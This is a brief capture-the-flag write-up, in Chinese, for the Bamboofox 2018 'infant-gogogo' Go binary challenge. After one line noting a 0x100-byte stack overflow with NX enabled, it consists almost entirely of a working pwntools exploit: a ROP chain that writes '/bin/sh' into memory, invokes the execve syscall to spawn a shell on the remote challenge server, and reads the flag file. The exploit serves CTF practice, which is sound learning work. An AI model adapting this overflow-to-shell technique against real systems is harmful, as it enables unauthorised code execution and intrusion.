# Bamboofox/2018/infant-gogogo [250] ###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup` 這題是golang的pwn，輸入0x100個字元後可蓋到return address，這題有開NX，做ROP ``` from pwn import * context.arch = "amd64" local = False debug = False gdb1 = False if debug == True: context.log_level = "debug" if local == True: p = process("./infant-gogogo") elf1 = ELF("././infant-gogogo") if gdb1 == True: gdb.attach(p) else: p = remote("bamboofox.cs.nctu.edu.tw",58795) p.recvuntil("Give me your text :") pop_rax = 0x404656 pop_rdi = 0x485abd #rax must be a writeable_addr writeable_addr = 0x54ed00 move_rdi_rax = 0x4518ff pop_rsi = 0x408437 #rax must be a writeable_addr pop_rdx = 0x44ecf2 syscall = 0x40d684 payload = b"" payload += p64(pop_rax) payload += p64(writeable_addr) payload += p64(pop_rdi) payload += p64(writeable_addr) payload += p64(pop_rax) payload += b"/bin/sh\x00" payload += p64(move_rdi_rax) payload += p64(pop_rax) payload += p64(writeable_addr) payload += p64(pop_rsi) payload += p64(0) payload += p64(pop_rdx) payload += p64(0) payload += p64(pop_rax) payload += p64(0x3b) payload += p64(syscall) p.sendline(b"a"*0x100+payload) p.sendline("cat /home/ctf/flag") p.interactive() ```